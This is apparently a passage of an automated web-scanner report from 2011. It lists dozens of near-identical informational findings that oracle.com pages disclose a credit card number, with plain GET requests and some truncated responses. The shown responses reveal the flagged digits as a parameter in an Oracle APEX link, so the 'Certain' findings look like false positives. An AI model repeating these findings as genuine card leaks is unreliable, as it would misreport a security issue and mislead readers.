Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/apps-tech/index-097651.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.19. http://www.oracle.com/technetwork/apps-tech/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/apps-tech/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/apps-tech/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.20. http://www.oracle.com/technetwork/architect/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/architect/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/architect/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41155972631552464,0:1)
Date: Tue, 06 Sep 2011 16:09:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.21. http://www.oracle.com/technetwork/articles/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/articles/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/articles/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.22. http://www.oracle.com/technetwork/community/developer-vm/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/community/developer-vm/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/community/developer-vm/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.23. http://www.oracle.com/technetwork/community/join/overview/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/community/join/overview/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/community/join/overview/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.24. http://www.oracle.com/technetwork/community/oracle-ace/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/community/oracle-ace/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/community/oracle-ace/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.25. http://www.oracle.com/technetwork/database/berkeleydb/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/database/berkeleydb/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.26. http://www.oracle.com/technetwork/database/enterprise-edition/documentation/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/database/enterprise-edition/documentation/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.27. http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/database/enterprise-edition/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.28. http://www.oracle.com/technetwork/database/enterprise-edition/overview/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/database/enterprise-edition/overview/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.29. http://www.oracle.com/technetwork/database/express-edition/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/database/express-edition/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.30. http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/database/features/instant-client/index-097480.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.31. http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/database/windows/downloads/index-101290.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.32. http://www.oracle.com/technetwork/dbadev/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/dbadev/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/dbadev/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=40971220316785020,0:1)
Date: Tue, 06 Sep 2011 16:09:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.33. http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/developer-tools/apex/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.34. http://www.oracle.com/technetwork/developer-tools/eclipse/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/developer-tools/eclipse/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.35. http://www.oracle.com/technetwork/developer-tools/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/developer-tools/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/developer-tools/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.36. http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/developer-tools/jdev/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.37. http://www.oracle.com/technetwork/developer-tools/sql-developer/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/developer-tools/sql-developer/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.38. http://www.oracle.com/technetwork/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=106;ecid=35926733983699874,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 200478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.39. http://www.oracle.com/technetwork/indexes/documentation/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/indexes/documentation/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/indexes/documentation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.40. http://www.oracle.com/technetwork/indexes/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/indexes/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/indexes/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.41. http://www.oracle.com/technetwork/indexes/products/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/indexes/products/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/indexes/products/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.42. http://www.oracle.com/technetwork/java/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/java/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/java/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35928456265613448,0:1)
Date: Tue, 06 Sep 2011 16:09:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.43. http://www.oracle.com/technetwork/middleware/fusion-middleware/documentation/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/middleware/fusion-middleware/documentation/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.44. http://www.oracle.com/technetwork/middleware/fusion-middleware/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/middleware/fusion-middleware/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.45. http://www.oracle.com/technetwork/middleware/fusion-middleware/overview/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/middleware/fusion-middleware/overview/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.46. http://www.oracle.com/technetwork/middleware/jrockit/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/middleware/jrockit/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/middleware/jrockit/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.47. http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/middleware/soasuite/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.48. http://www.oracle.com/technetwork/oem/downloads/index-084446.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/oem/downloads/index-084446.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/oem/downloads/index-084446.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.49. http://www.oracle.com/technetwork/oem/grid-control/documentation/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/oem/grid-control/documentation/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.50. http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/oem/grid-control/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/oem/grid-control/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.51. http://www.oracle.com/technetwork/oem/grid-control/overview/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/oem/grid-control/overview/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/oem/grid-control/overview/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.52. http://www.oracle.com/technetwork/oramag/magazine/home/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/oramag/magazine/home/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/oramag/magazine/home/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.53. http://www.oracle.com/technetwork/server-storage/solaris/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/server-storage/solaris/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.54. http://www.oracle.com/technetwork/systems/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/systems/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/systems/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41054851921233213,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 125818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.55. http://www.oracle.com/technetwork/topics/cloud/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/topics/cloud/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/topics/cloud/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.56. http://www.oracle.com/technetwork/topics/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/topics/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/topics/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.57. http://www.oracle.com/technetwork/topics/newtojava/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/topics/newtojava/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/topics/newtojava/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.58. http://www.oracle.com/technetwork/topics/newtojava/overview/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/topics/newtojava/overview/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41116059499862577,0:1)
Content-Length: 135188
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:13:08 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.59. http://www.oracle.com/technetwork/topics/security/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/topics/security/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/topics/security/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.60. http://www.oracle.com/technetwork/topics/soa/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/topics/soa/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/topics/soa/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.61. http://www.oracle.com/technetwork/topics/virtualization/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/topics/virtualization/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/topics/virtualization/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.62. http://www.oracle.com/us/community/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/community/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/community/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.63. http://www.oracle.com/us/corporate/Acquisitions/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/Acquisitions/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/Acquisitions/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.64. http://www.oracle.com/us/corporate/analystrelations/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/analystrelations/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/analystrelations/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.65. http://www.oracle.com/us/corporate/blogs/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/blogs/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/blogs/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.66. http://www.oracle.com/us/corporate/careers/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/careers/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/careers/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.67. http://www.oracle.com/us/corporate/citizenship/community/038108.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/citizenship/community/038108.htm

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/citizenship/community/038108.htm HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.68. http://www.oracle.com/us/corporate/citizenship/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/citizenship/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/citizenship/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.69. http://www.oracle.com/us/corporate/customers/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/customers/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/customers/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.70. http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/customers/oracle-users-groups-192206.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.71. http://www.oracle.com/us/corporate/features/engineered-173370.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/features/engineered-173370.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/features/engineered-173370.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.72. http://www.oracle.com/us/corporate/history/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/history/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/history/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.73. http://www.oracle.com/us/corporate/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.74. http://www.oracle.com/us/corporate/innovation/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/innovation/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/innovation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.75. http://www.oracle.com/us/corporate/insight/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/insight/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/insight/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.76. http://www.oracle.com/us/corporate/investor-relations/corporate-governance-176724.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/investor-relations/corporate-governance-176724.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.77. http://www.oracle.com/us/corporate/investor-relations/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/investor-relations/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/investor-relations/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.78. http://www.oracle.com/us/corporate/oracle-racing-070515.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/oracle-racing-070515.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/oracle-racing-070515.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.79. http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/press/BoardofDirectors/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/press/BoardofDirectors/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.80. http://www.oracle.com/us/corporate/press/Executives/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/press/Executives/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/press/Executives/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.81. http://www.oracle.com/us/corporate/press/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/press/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/press/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.82. http://www.oracle.com/us/corporate/pricing/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/pricing/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/pricing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

